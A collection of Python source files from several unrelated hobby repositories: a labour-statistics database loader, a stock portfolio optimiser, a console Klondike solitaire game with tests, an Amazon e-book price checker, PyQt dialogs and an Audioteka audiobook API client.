filepath = "{}/{}".format(root, file)
log.info(
"Reading Excel file: {} --- This may take a few minutes.".format(
filepath
)
)
return pd.read_excel(filepath)
# Remove directory
if clean_up:
shutil.rmtree(self.tempfile_dir)
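# Example usage (editor's sketch, not part of the original file):
#
#   downloader = OESDataDownloader(year="2019")
#   oes_df = downloader.download_oes_data()
#   print(oes_df.head())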
```
#### File: data/scripts/sql_loader_jed.py
```python
import logging
import os
import pandas as pd
from sqlalchemy.types import Integer, Numeric, String
from sqlalchemy import create_engine
from data.bls.oes_data_downloader import OESDataDownloader
from data.bls.utils.dtype_conversion import to_float, to_int
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
JOBHOPPER_DB = "jobhopperdatabase" if not os.getenv("DB_NAME") else os.getenv("DB_NAME")
USERNAME = "jobuser" if not os.getenv("DB_USER") else os.getenv("DB_USER")
PASSWORD = "<PASSWORD>" if not os.getenv("DB_PASSWORD") else os.getenv("DB_PASSWORD")
PORT = "5432" if not os.getenv("DB_PORT") else os.getenv("DB_PORT")
HOST = "localhost" if not os.getenv("DB_HOST") else os.getenv("DB_HOST")
def create_sqlalchemyengine(
username: str = "", password: str = "", port: str = "5432", host: str = "localhost"
):
"""
Create a database connection to a SQLite database based on the specified params
Note: Postgres must be installed with the project database to run this locally
:param username: Database user, if available
    :param password: Password for the database user, if available
:param port: Default for Postgres is 5432
:param host: localhost by default
"""
try:
log.info("Connecting to Postgres DB via SQLAlchemy")
engine = create_engine(
"postgresql://{}:{}@{}:{}/{}".format(
username, password, host, port, JOBHOPPER_DB
)
)
return engine
except Exception as e:
log.error(e)
def load_bls_oes_to_sql(file_to_load=""):
"""
Load BLS OES data from 2019 to Postgres.
# TODO: Check OES data from prior years for formatting
# TODO: Clean/combine SOC codes from datasets to include latest data on SOC codes from transitions data
"""
log.info("Loading BLS wage and employment data to Postgres")
engine = create_sqlalchemyengine(
username=USERNAME, password=PASSWORD, port=PORT, host=HOST
)
if file_to_load == "":
        bls_oes_data = OESDataDownloader(year="2019").download_oes_data()
else:
bls_oes_data = pd.read_excel(file_to_load)
# TODO: Abstract into data cleaning step once we finalize format
# O*Net SOC codes generally append .00 to the original SOC codes
bls_oes_data = (
bls_oes_data[
["area_title", "occ_code", "occ_title", "h_mean", "a_mean", "tot_emp"]
]
.assign(
soc_decimal_code=bls_oes_data["occ_code"].apply(
lambda x: "{}.00".format(x)
),
h_mean=bls_oes_data["h_mean"].apply(lambda x: to_float(x)),
a_mean=bls_oes_data["a_mean"].apply(lambda x: to_float(x)),
tot_emp=bls_oes_data["tot_emp"].apply(lambda x: to_int(x)),
)
.rename(
{
"occ_code": "soc_code",
"occ_title": "soc_title",
"h_mean": "hourly_mean_wage",
"a_mean": "annual_mean_wage",
"tot_emp": "total_employment",
},
axis=1,
)
)
bls_oes_data.to_sql(
"bls_oes",
engine,
if_exists="replace",
index=False,
dtype={
"soc_decimal_code": String(),
"hourly_mean_wage": Numeric(),
"annual_mean_wage": Numeric(),
"total_employment": Integer(),
"soc_code": String(),
"soc_title": String(),
},
)
log.info("Successfully loaded BLS data to Postgres!")
return bls_oes_data
def load_occupation_transitions_to_sql(
file_path="../occupation_transitions_public_data_set.csv",
):
"""
Load the occupation transitions data to SQL from the CSV file in jobhopper.data
"""
log.info("Loading occupation transitions (Burning Glass) data to Postgres")
engine = create_sqlalchemyengine(
username=USERNAME, password=PASSWORD, port=PORT, host=HOST
)
occupation_transitions = pd.read_csv(
file_path,
na_values=["NA"],
usecols=["soc1", "soc2", "total_soc", "pi", "occleaveshare"],
dtype={
"soc1": str,
"soc2": str,
"total_soc": int,
"pi": float,
"occleaveshare": float,
},
)
occupation_transitions.to_sql(
"occupation_transition",
engine,
if_exists="replace",
index=False,
dtype={
"soc1": String(),
"soc2": String(),
"total_soc": Integer(),
"pi": Numeric(),
"occleaveshare": Numeric(),
},
)
return occupation_transitions
if __name__ == "__main__":
"""
Expected results in postgres table:
jobhopperdatabase=# SELECT * FROM bls_oes_data LIMIT 5;
area_title | soc_code | soc_title | hourly_mean_wage | annual_mean_wage | total_employment | soc_decimal_code
------------+----------+------------------------------------------------+------------------+------------------+------------------+------------------
U.S. | 11-0000 | Management Occupations | 58.88 | 122480.0 | 8054120 | 11-0000.00
U.S. | 13-0000 | Business and Financial Operations Occupations | 37.56 | 78130.0 | 8183750 | 13-0000.00
U.S. | 15-0000 | Computer and Mathematical Occupations | 45.08 | 93760.0 | 4552880 | 15-0000.00
U.S. | 17-0000 | Architecture and Engineering Occupations | 42.69 | 88800.0 | 2592680 | 17-0000.00
U.S. | 19-0000 | Life, Physical, and Social Science Occupations | 37.28 | 77540.0 | 1288920 | 19-0000.00
jobhopperdatabase=# SELECT * FROM occupation_transition LIMIT 5;
soc1 | soc2 | total_soc | pi | occleaveshare
---------+---------+-----------+-------------------------+---------------
11-1011 | 17-1022 | 1425400 | 0.0006041965 | 0.14635982
11-1011 | 25-1065 | 1425400 | 0.000023418379999999998 | 0.14635982
11-1011 | 33-9032 | 1425400 | 0.0028994256 | 0.14635982
11-1011 | 53-7073 | 1425400 | 0.000013282203 | 0.14635982
11-1011 | 19-4031 | 1425400 | 0.00004537824000000001 | 0.14635982
"""
# load_bls_oes_to_sql(
# "C:/Users/jedpi/OneDrive/Documents/GitHub/jobhopper/oesm19all/all_data_M_2019.xlsx"
# )
load_occupation_transitions_to_sql(
"C:/Users/jedpi/OneDrive/Documents/GitHub/jobhopper/data/occupation_transitions_public_data_set.csv"
)
```
|
{
"source": "jedpittman/python_samples",
"score": 3
}
|
#### File: python_samples/StockPortfolio/runportfolio.py
```python
import pandas as pd
import numpy as np
import requests
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
#load the data
# from google.colab import files
# files.upload()
# Store the data
df = pd.read_csv("data\FakeStockData.csv")
# df = pd.read_csv('NUSE_Close.csv')
#df # show the data frame.
# Should be this form:
# Date | Symbol1 | symbol2 ... etc.
# for each symbol, should be a close price.
# Set the date as the index (set_index returns a new frame, so assign back)
df = df.set_index(pd.DatetimeIndex(df['Date'].values))
# Remove the date column from the df
# columns = axis 1
df.drop(columns=['Date'], axis=1, inplace=True)
#print(df)
#df
#exit(1)
# Calculate the expected annualized returns and the annualized
# sample covariance matrix of the daily asset returns.
mu = expected_returns.mean_historical_return(df)
S = risk_models.sample_cov(df)
# The Sharpe ratio (SR) describes the excess return you get for the
# volatility you endure holding a riskier asset.
ef = EfficientFrontier(mu, S) # create the EF object
weights = ef.max_sharpe() # Get the raw weights
# this will set weights below cutoff to zero, rounding the rest.
cleaned_weights = ef.clean_weights()
print(cleaned_weights)
#show the expected return, SR, and
# in a jupyter notebook, this shows an ordered dicts.
# should sum to 1 for all weights.
ef.portfolio_performance(verbose=True)
#Figure out the allocations for each stock.
# pip install pulp
#Get the discrete allocation of each share per stock
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
portfolio_val = 5000 # how much to invest
latest_prices = get_latest_prices(df)
weights = cleaned_weights
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_val)
allocation, leftover = da.lp_portfolio()
# Returns a dictionary with pairs ticker: #shares
# Returns 1 leftover.
print('Discrete allocation:', allocation)
print("leftovers: ",leftover)
exit(1)
"""
# Get company name for stock ticker
def get_company_name(symbol):
    url = 'http://d.yimg.com/autoc.finance.yahoo.com/autoc?query=' + symbol + '&region=1&lang=en'
result = requests.get(url).json()
for r in result['ResultSet']['Result']:
if r['symbol'] == symbol:
return r['name']
# Store the company name into a list.
company_name = []
for symbol in allocation:
company_name.append( get_company_name(symbol))
# Get the discrete allocation values
discrete_allocation_list = []
for symbol in allocation:
    discrete_allocation_list.append(allocation.get(symbol))
# Create a dataframe for the portfolio
portfolio_df = pd.DataFrame(columns=['Company_name', 'Company_ticker', 'Discrete_val_' + str(portfolio_val)])
portfolio_df['Company_name'] = company_name
portfolio_df['Company_ticker'] = allocation
portfolio_df['Discrete_val' + str(portfolio_val)] = discrete_allocation_list
# Show it.
portfolio_df
"""
```
|
{
"source": "jedrennen/pyklondike",
"score": 3
}
|
#### File: pyklondike/PyKlondike/game.py
```python
from sys import stdout
from playingCard import PlayingCard
from cardPile import CardPile
from tablePile import TablePile
from drawPile import DrawPile
from discardPile import DiscardPile
from suitPile import SuitPile
class Game(object):
suits = ['s', 'h', 'c', 'd']
ranks = ['A', '2', '3', '4', '5', '6', '7',
'8', '9', '0', 'J', 'Q', 'K']
cards = []
piles = []
def __init__(self, out=stdout, no_shuffle=False):
self.out = out
self._shuffle = not no_shuffle
#self.table_piles = [TablePile() for _ in range(7)]
self._seed_cards()
self._seed_piles()
def _seed_cards(self):
self.cards = []
for i, suit in enumerate(self.suits):
for j, rank in enumerate(self.ranks):
self.cards.append(PlayingCard(rank, suit))
def _seed_piles(self):
self.piles = []
self.piles = [DrawPile(), DiscardPile()]
for i in range(0,4):
self.piles.append(SuitPile())
for i in range(0, 7):
self.piles.append(TablePile())
def draw(self):
if self.piles[0].is_empty():
while not self.piles[1].is_empty():
card = self.piles[1].pop()
card.flip()
self.piles[0].add_card(card)
else:
card = self.piles[0].pop()
card.pile_number = 1
card.pile_index = len(self.piles[1])
self.piles[1].add_card(card)
if not card.is_face_up():
card.flip()
def quit(self):
self.piles = []
self.cards = []
def deal(self):
for pile in self.piles:
pile.clear()
self._seed_cards()
self._seed_piles()
z = 0
j = 0
for i in range(0, 28):
pile_index = 6 + j
card = self.cards[51 - i]
if j == z:
card.flip()
card.pile_number = pile_index
card.pile_index = len(self.piles[pile_index])
self.piles[pile_index].add_card(card)
j += 1
if pile_index == 12:
z += 1
j = z
for i in range(28, 52):
card = self.cards[51 - i]
card.pile_number = 0
card.pile_index = len(self.piles[0])
self.piles[0].add_card(card)
def move_card(self, card_from_str, card_to_str=''):
card_from_index = self._get_card_index(card_from_str)
card_from = self.cards[card_from_index]
if not card_from.is_face_up():
raise ValueError("Invalid move (hidden card) Pile: %r, Index: %r" % (
card_from.pile_number, card_from.pile_index))
if card_to_str == '':
top_card = self.piles[card_from.pile_number].top()
if card_from.rank_number == 0 and card_from == top_card:
for i, pile in enumerate(self.piles[2:6]):
if pile.can_take(card_from):
moved_card = self.piles[card_from.pile_number].pop()
moved_card.pile_index = len(pile)
moved_card.pile_number = i + 2
pile.add_card(moved_card)
return
elif card_from.rank_number == 12:
for i, pile in enumerate(self.piles[6:]):
if pile.can_take(card_from):
self._move_cards(card_from.pile_number, card_from.pile_index, i + 6)
#moved_card = self.piles[card_from.pile_number].pop()
#moved_card.pile_index = len(pile)
#moved_card.pile_number = i + 6
#pile.add_card(moved_card)
return
else:
raise ValueError("Invalid move (no 'TO' card)")
else:
to_card_index = self._get_card_index(card_to_str)
to_card = self.cards[to_card_index]
to_pile = self.piles[to_card.pile_number]
if not to_pile.can_take(card_from):
raise ValueError("Invalid move (can't take)")
else:
self._move_cards(card_from.pile_number, card_from.pile_index, to_card.pile_number)
return
    def won(self):
        # The game is won only when all four suit piles are complete.
        return all(len(pile) == 13 for pile in self.piles[2:6])
def _get_card_index(self, card):
rank_index = self.ranks.index(card[0:1].upper())
suit_index = self.suits.index(card[1:2].lower())
return 13 * suit_index + rank_index
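    # Worked example (editor's note): for the card string '2h', rank '2' has
    # index 1 in self.ranks and suit 'h' has index 1 in self.suits, so the
    # card sits at index 13 * 1 + 1 = 14 in the self.cards list.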
def _move_cards(self, from_pile_number, card_index, to_pile_number):
temp_pile = []
while len(self.piles[from_pile_number]) > card_index:
temp_pile.append(self.piles[from_pile_number].pop())
for i in range(0, len(temp_pile)):
card = temp_pile.pop()
card.pile_number = to_pile_number
card.pile_index = len(self.piles[to_pile_number])
self.piles[to_pile_number].add_card(card)
```
#### File: pyklondike/PyKlondike/main.py
```python
from sys import argv
from sys import stdout
from playingCard import PlayingCard
from cardPile import CardPile
from tablePile import TablePile
from discardPile import DiscardPile
from drawPile import DrawPile
from suitPile import SuitPile
from game import Game
_COLOR_RESET = '\033[0m'
_BLACK_CARD_COLOR = '\033[30;47m'
_RED_CARD_COLOR = '\033[31;47m'
_EMPTY_PILE_COLOR = '\033[37;40m'
#class SuitPile(CardPile):
# def __init__(self):
# pass
#class DiscardPile(CardPile):
# def __init__(self):
# pass
class Controller(object):
def __init__(self):
self.table_piles = []
#for i in (0,7)
class ConsolePrinter(object):
def __init__(self):
pass
def draw_table(self):
pass
def draw_card(card):
    if not card.is_face_up():
return _EMPTY_PILE_COLOR + '-<*>-' + _COLOR_RESET
elif card.suit == 'c' or card.suit == 's':
text_color = _BLACK_CARD_COLOR # Black text on White Background
else:
text_color = _RED_CARD_COLOR # Red text on White Background
return "%s %s %s %s" % (text_color, card.rank, card.suit, _COLOR_RESET)
def draw_empty_pile():
return '%s|___|%s' % (_EMPTY_PILE_COLOR, _COLOR_RESET)
def draw_non_table_pile(pile):
if len(pile) == 0:
return draw_empty_pile()
elif pile.count_facing_up() > 0:
return draw_card(pile[-1])
else:
return '%s---' % len(pile)
def draw_table_pile_summary_row(piles):
result = ''
for i, pile in enumerate(piles):
result += '%s----' % pile.count_facing_down()
if i < 6:
result += ' '
    return result
def draw_table_pile_row(piles, row_index):
result = ''
for i, pile in enumerate(piles):
card_to_print = pile.get_face_up_card(row_index)
if card_to_print == None:
result += ' '
else:
result += draw_card(card_to_print)
if i < 6:
result += ' '
return result
def draw_board(piles, out=stdout):
table_pile_rows = 0
for pile in piles[6:13]:
pile_rows = pile.count_facing_up()
if pile_rows > table_pile_rows:
table_pile_rows = pile_rows
pile_row_output = ''
for i in range(0, table_pile_rows):
pile_row_output += draw_table_pile_row(piles[6:13], i)
pile_row_output += '\n'
output = """
%s %s %s %s %s %s
%s
%s
\033[0m""" % (draw_non_table_pile(piles[0]), draw_non_table_pile(piles[1]),
draw_non_table_pile(piles[2]), draw_non_table_pile(piles[3]),
draw_non_table_pile(piles[4]), draw_non_table_pile(piles[5]),
draw_table_pile_summary_row(piles[6:13]),
pile_row_output)
out.write(output)
klondike = Game()
klondike.deal()
continue_game = True
while continue_game:
if klondike.won():
print "\n\t CONGRATULATIONS! \n"
klondike.quit()
continue_game = False
continue
draw_board(klondike.piles)
command = raw_input('> ')
if command == 'newcard':
klondike.draw()
elif command == 'newgame':
klondike.quit()
klondike.deal()
elif command[0:5] == 'move ' and command[8:10] == 'to' and len(command) == 13:
try:
klondike.move_card(command[5:7], command[11:13])
except ValueError:
print '\n\tInvalid move\n'
elif command[0:5] == 'move ' and len(command) == 7:
try:
klondike.move_card(command[5:7])
except ValueError:
print '\n\tInvalid move\n'
elif command == 'quit':
klondike.quit()
continue_game = False
```
#### File: pyklondike/PyKlondike/suitPile.py
```python
from playingCard import PlayingCard
from cardPile import CardPile
class SuitPile(CardPile):
def __init__(self):
super(SuitPile, self).__init__()
def can_take(self, card):
if self.is_empty():
return card.rank == 'A'
top_card = self.top()
return (top_card.suit == card.suit and
(top_card.rank_number + 1) == card.rank_number)
```
#### File: pyklondike/PyKlondike/tablePile.py
```python
from playingCard import PlayingCard
from cardPile import CardPile
class TablePile(CardPile):
def __init__(self):
super(TablePile, self).__init__()
def get_face_up_card(self, index):
pile_index = self.count_facing_down() + index
if pile_index >= len(self._cards):
return None
else:
return self._cards[pile_index]
def pop(self):
result = super(TablePile, self).pop()
if len(self._cards) > 0 and self.count_facing_up() == 0:
self._cards[-1].flip()
return result
def can_take(self, card):
if self.is_empty():
return card.rank_number == 12
top_card = self.top()
return (top_card.rank_number - 1 == card.rank_number and
top_card.color != card.color)
```
#### File: pyklondike/tests/PyKlondike_tests.py
```python
from nose.tools import *
import sys
from StringIO import StringIO
from PyKlondike.game import Game
from PyKlondike.cardPile import CardPile
from PyKlondike.playingCard import PlayingCard
#from PyKlondike.main import *
def foo(out=sys.stdout):
out.write("hello")
def setup():
pass
def test_std_output():
out = StringIO()
foo(out = out)
output = out.getvalue().strip()
assert_equal(output, "hello")
#
#def foo(out=sys.stdout):
# out.write("hello, world!")
#Then the test is much simpler:
#
#def test_foo():
# from foomodule import foo
# from StringIO import StringIO
#
# out = StringIO()
# foo(out=out)
# output = out.getvalue().strip()
# assert output == 'hello world!'
@nottest
def test_new_game_prints_board():
new_board = """
24--- \033[31;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m \033[37;40m|___|\033[0m
0---- 1---- 2---- 3---- 4---- 5---- 6----
\033[31;47m K d \033[0m \033[31;47m 6 d \033[0m \033[30;47m K c \033[0m \033[30;47m 8 c \033[0m \033[30;47m 4 c \033[0m \033[30;47m A c \033[0m \033[31;47m Q h \033[0m
"""
out = StringIO()
game = Game(out=out, no_shuffle=True)
slice_start = 0
slice_end = min((slice_start + 9), len(new_board))
game.deal()
output = out.getvalue()
# assert_equal(output[slice_start:slice_end],
# new_board[slice_start:slice_end])
@nottest
def test_deal():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
assert_equal(13, len(game.piles))
assert_equal(24, len(game.piles[0]))
for i, pile in enumerate(game.piles[1:6]):
assert_equal(0, len(pile))
for i, pile in enumerate(game.piles[6:]):
assert_equal(i + 1, len(pile))
@nottest
def test_draw_flips_one_card_from_draw_pile_to_discard_pile():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
expected_draw_pile_size = len(game.piles[0]) - 1
game.draw()
assert_equal(expected_draw_pile_size, len(game.piles[0]))
assert_equal(1, len(game.piles[1]))
assert_true(game.piles[1][0].is_face_up())
@nottest
def test_quit_ends_game():
out = StringIO()
game = Game(out=out, no_shuffle=True)
game.deal()
game.quit()
output = out.getvalue()[-22:]
assert_equal(0, len(game.piles))
# assert_equal(output, "\n\tThanks for Playing!\n")
@nottest
def test_draw_non_table_pile_with_no_face_up_cards():
pile = CardPile()
cards = [PlayingCard('A', 's'), PlayingCard(2, 's'), PlayingCard(3, 's')]
for card in cards:
pile.append(card)
result = draw_non_table_pile(pile)
assert_equal('3---', result)
@nottest
def test_draw_non_table_pile_with_ace_up_card():
pile = CardPile()
cards = [PlayingCard('A', 's'), PlayingCard(2, 's'), PlayingCard(3, 's')]
for card in cards:
card.flip()
pile.append(card)
result = draw_non_table_pile(pile)
assert_equal('\033[30;47m 3 s \033[0m', result)
@nottest
def test_draw_non_table_pile_with_empty_pile():
pile = CardPile()
result = draw_non_table_pile(pile)
assert_equal('\033[37;40m|___|\033[0m', result)
@nottest
def test_draw_card():
cards = [PlayingCard('A', 's'), PlayingCard(0, 'h')]
result = draw_card(cards[0])
assert_equal('\033[30;47m A s \033[0m', result)
result = draw_card(cards[1])
assert_equal('\033[31;47m 0 h \033[0m', result)
@nottest
def test_draw_table_pile_summary_row():
card = PlayingCard('A', 's')
card1 = PlayingCard(2, 's')
card1.flip()
pile0 = TablePile()
pile1 = TablePile()
pile1.append(card)
pile2 = TablePile()
pile2.append(card)
pile2.append(card1)
piles = [pile0, pile1, pile2, pile0, pile1, pile2, pile0]
result = draw_table_pile_summary_row(piles)
assert_equal('0---- 1---- 1---- 0---- 1---- 1---- 0----', result)
@nottest
def test_draw_table_pile_row():
card = PlayingCard('A', 's')
card1 = PlayingCard(2, 's')
card1.flip()
pile0 = TablePile()
pile1 = TablePile()
pile1.append(card)
pile2 = TablePile()
pile2.append(card)
pile2.append(card1)
piles = [pile0, pile1, pile2, pile0, pile1, pile2, pile0]
result = draw_table_pile_row(piles, 0)
assert_equal(' \033[30;47m 2 s \033[0m \033[30;47m 2 s \033[0m ', result)
```
|
{
"source": "jedrivisser/amazon_ebook_specials",
"score": 3
}
|
#### File: jedrivisser/amazon_ebook_specials/ebook_specials.py
```python
import urllib
import urllib2
import unicodedata
import cookielib
import re
import ConfigParser
import os
from bs4 import BeautifulSoup
class EbookSpecials:
"""
Amazon e-book Specials checker
This program checks for books by <authors> (using their amazon ID) which
cost less than <price> and filters out all books in <ignore>.
You can overwrite <price> for a specific book by adding its name and value
to the <overwrite> dictionary
"""
def __init__(self):
# Instance attributes set by config
self.max_price = None
self.login = None
self.email = None
self.password = None
self.use_proxy = None
self.proxy = None
self.authors = None
self.ignore = None
self.own = None
self.overwrite = None
self.books = None
self.load_config()
# Set up proxy, opener and cookies ####################################
cj = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
self.opener.addheaders = [('User-Agent',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0'), ]
if self.use_proxy:
self.opener.add_handler(
urllib2.ProxyHandler({"https": self.proxy, "http": self.proxy}))
if self.login:
self.log_in()
# Go through whole list of authors and call getPage() for each result
# page for each author ################################################
message = unicode('')
for authorID in self.authors:
# Run once to get first page and a page count #####################
result = self.check_page(authorID)
if result:
m, pages, more = result
message += unicode(m)
# Run for the other pages if more than one needs to be loaded
for page in range(2, pages + 1):
if more:
m, more = self.check_page(authorID, page)
message += unicode(m)
else:
print "Could not connect"
return
for bookID in self.books.keys():
max_book_price = self.max_price if float(
self.books[bookID]) < 0 else float(self.books[bookID])
m = self.check_book(bookID, max_book_price)
message += unicode(m)
message = unicodedata.normalize('NFKD', message).encode('ascii', 'ignore')
if message == '':
message = "No books cheaper than $" + str(self.max_price)
print "======e-books cheaper than $" + str(self.max_price) + "======\n" + message
def check_page(self, author_id, page=1):
"""
Checks one page for specials and returns the found specials,
the number of pages, and if you should look for more specials.
"""
url = "http://www.amazon.com/r/e/" + author_id + \
"/?rh=n%3A283155%2Cp_n_feature_browse-bin%3A618073011&sort=price&page=" + str(page)
try:
data = str(self.opener.open(url).read())
except urllib2.HTTPError, e:
print e.code
print e.read()
return None
soup = BeautifulSoup(data, "html.parser")
books = soup("div", {"id": re.compile('result_.*')})
message = ""
more = True
for book in books:
book_id = book['name']
name = book('h3')[0]('a')[0].string
link = "http://www.amazon.com/dp/" + book_id
prices = book('div', 'tp')[0]('table')[0]('tr')[1]('td')[2]('a')
# if book has no price available
if not len(prices) == 0:
# needed to ignore kindleUnlimited $0.00
price_string = prices[len(prices) - 1].string
price_float = float(price_string[1:])
if price_float < self.max_price:
if book_id in self.ignore or book_id in self.own:
continue
elif book_id in self.overwrite:
if price_float < float(self.overwrite[book_id]):
message += name + " " + price_string + " - " + link + "\n"
else:
message += name + " " + price_string + " - " + link + "\n"
else:
# sets more to false if prices on page go above 'max_price'
more = False
if page == 1:
if soup('span', "pagnDisabled"):
pages = int(soup('span', "pagnDisabled")[0].string)
elif soup('span', "pagnLink"):
pages = int(soup('span', "pagnLink")[-1].string)
else:
pages = 1
return message, pages, more
else:
return message, more
def check_book(self, book_id, max_price):
"""Check price of specific book from the [BOOKS] section"""
url = "http://www.amazon.com/dp/" + book_id
try:
data = str(self.opener.open(url).read())
except urllib2.HTTPError, e:
print e.code
print e.read()
return None
soup = BeautifulSoup(data, "html.parser")
name = soup.title.string[12:-14]
price = soup("tr", "kindle-price")[0]("td")[1].find(text=True).strip()
d_price = float(price[1:])
message = ""
if d_price < max_price:
message = name + " " + price + " - " + url + "\n"
return message
def log_in(self):
"""Log-in to you amazon account"""
# Get and set form params #############################################
url_login_page = "https://www.amazon.com/ap/signin/182-9380882-4173709" + \
"?openid.assoc_handle=usflex" + \
"&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" + \
"&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select" + \
"&openid.mode=checkid_setup" + \
"&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0" + \
"&openid.return_to" + \
"=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dgno_signin"
try:
response = self.opener.open(url_login_page)
except urllib2.HTTPError, e:
print e.code
print e.read()
exit(1)
return None
response_text = response.read()
pattern = '<input(.*?)name="(.+?)"(.*?)value="(.+?)"(.*?)/>'
matches = re.findall(pattern, response_text)
params = dict()
for value in matches:
if value[1] != 'email' and value[1] != 'create':
params[value[1]] = value[3]
params['email'] = self.email
        params['password'] = self.password
params = urllib.urlencode(params)
# Post login details ##################################################
url_login_post = "https://www.amazon.com/ap/signin"
try:
response = self.opener.open(url_login_post, params)
except urllib2.HTTPError, e:
print e.code
print e.read()
exit(1)
if response.geturl() == "https://www.amazon.com/gp/yourstore/home?ie=UTF8&ref_=gno_signin&":
print "Log-in for " + self.email + " successful."
else:
# response.geturl() == "https://www.amazon.com/ap/signin"
print "Log-in for " + self.email + " unsuccessful."
print "Double check your password in ebook.ini."
print "quitting."
exit(1)
def load_config(self):
"""Loads config from file"""
config_file = os.path.splitext(__file__)[0] + ".ini"
config = ConfigParser.SafeConfigParser(allow_no_value=True)
config.optionxform = str
config.read(config_file)
self.max_price = config.getfloat("CONFIG", "max_price")
self.login = config.getboolean("CONFIG", "login")
if self.login:
self.email = config.get("CONFIG", "email")
self.password = config.get("CONFIG", "password")
self.use_proxy = config.getboolean("CONFIG", "use_proxy")
if self.use_proxy:
self.proxy = config.get("CONFIG", "proxy")
self.authors = config.options("AUTHORS")
self.ignore = config.options("IGNORE")
self.own = config.options("OWN")
self.overwrite = dict(config.items("OVERWRITE"))
self.books = dict(config.items("BOOKS"))
if __name__ == "__main__":
EbookSpecials()
```
|
{
"source": "jedrus2000/arimr2traces",
"score": 2
}
|
#### File: arimr2traces/arimr2traces/arimr_login.py
```python
from PyQt5.QtWidgets import QDialog
from PyQt5 import uic
from .resources.resources import ARIMR_LOGIN_DIALOG_FORM
class ARIMRLoginDialog(QDialog):
"""
ARiMR login page
"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
uic.loadUi(ARIMR_LOGIN_DIALOG_FORM, self)
self.loginLineEdit.setFocus()
```
#### File: arimr2traces/arimr2traces/fetching_data_progress_dialog.py
```python
from PyQt5.QtWidgets import QDialog
from PyQt5 import uic
from .resources.resources import FETCHING_DATA_PROGRESS_DIALOG_FORM
class FetchingDataProgressDialog(QDialog):
"""
Progress dialog while fetching data
"""
def __init__(self, parent=None):
QDialog.__init__(self, parent)
uic.loadUi(FETCHING_DATA_PROGRESS_DIALOG_FORM, self)
self.cancelButton.clicked.connect(self.reject)
def setProgressValue(self, value):
self.progressBar.setValue(value)
if value == self.progressBar.maximum():
self.accept()
```
|
{
"source": "jedrus2000/audtekapi",
"score": 2
}
|
#### File: audtekapi/audtekapi/__init__.py
```python
from __future__ import unicode_literals
import hashlib
import binascii
import struct
import re
import requests
from requests.auth import HTTPDigestAuth
import logging
from datetime import datetime
__version__ = '0.2.1'
AUDIOTEKA_API_URL = "https://proxy3.audioteka.com/pl/MobileService.svc/"
AUDIOTEKA_API_VERSION = "2.3.15"
DEFAULT_HEADERS = {"User-agent": "Android/" + AUDIOTEKA_API_VERSION}
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def get_categories(
category_name, page=1, per_page_count=100, samples=False, session=None, headers=None
):
"""
gets Categories
:param category_name:
:param page:
:param per_page_count:
:param samples:
:param session:
:param headers:
:return:
"""
return _post(
"categories",
{},
session,
{
"categoryName": category_name,
"page": page,
"samples": samples,
"count": per_page_count,
},
headers,
).json()
def login(user_login, user_password, session=None, headers=None):
"""
signing in into Audioteka.
:param user_login:
:param user_password:
:param session:
:param headers:
:return: credentials Dict with login data,token and hashed password
{
"userLogin": "yyyyyyyyyyyyyyyyy",
"userPassword": "<PASSWORD>",
"HashedPassword": "<PASSWORD>",
"AuthenticationToken": "<PASSWORD>",
"Salt": "3666666666",
"Status": "LoginStatusOk"
}
"""
headers = headers if headers else DEFAULT_HEADERS
headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
credentials = {"userLogin": user_login, "userPassword": <PASSWORD>}
r = _post("login", credentials, session, {}, headers)
logged_in_data = r.json()
if logged_in_data["Status"] == "LoginStatusErr":
_set_response_login_failed(r)
r.raise_for_status()
logged_in_data["HashedPassword"] = _get_hashed_password(
credentials["userPassword"], logged_in_data["Salt"]
)
logged_in_data["userLogin"] = credentials["userLogin"]
return logged_in_data
def get_shelf(credentials, session=None, headers=None):
"""
gets personal shelf content
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"get_shelf", credentials, session, {"onlyPaid": "false"}, headers
).json()
def get_shelf_item(product_id, credentials, session=None, headers=None):
"""
gets one book details
:param product_id:
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"shelf_item", credentials, session, {"productId": product_id}, headers
).json()
def get_chapters(
tracking_number, line_item_id, credentials, session=None, headers=None
):
"""
get list of chapters from book
:param tracking_number:
:param line_item_id:
:param credentials:
:param session:
:param headers:
:return:
"""
return _post(
"get_chapters",
credentials,
session,
{"lineItemId": line_item_id, "trackingNumber": tracking_number},
headers,
).json()
def get_chapter_file(
tracking_number,
line_item_id,
download_server_url,
download_server_footer,
file_name,
credentials,
stream=False,
session=None,
headers=None,
):
"""
gets chapter file.
:param tracking_number:
:param line_item_id:
:param download_server_url:
:param download_server_footer:
:param file_name:
:param credentials:
:param stream: Default: False. If True, returns stream (chunks)
:param session:
:param headers:
:return: Requests response
"""
s = session if session else requests.session()
if not headers:
headers = DEFAULT_HEADERS
headers["XMobileAudiotekaVersion"] = AUDIOTEKA_API_VERSION
headers["XMobileAppVersion"] = DEFAULT_HEADERS["User-agent"]
headers["Range"] = "bytes=0-"
url = (
download_server_url
+ "?TrackingNumber={0}&LineItemId={1}&FileName={2}&".format(
tracking_number, line_item_id, file_name
)
+ download_server_footer
)
r = s.get(
url,
auth=HTTPDigestAuth(credentials["userLogin"], credentials["HashedPassword"]),
headers=headers,
stream=stream
)
return r
def epoch_to_datetime(aud_dt):
"""
converts datetime in format: /Date(1545693401480+0100)/ into Datetime
:param aud_dt:
:return:
"""
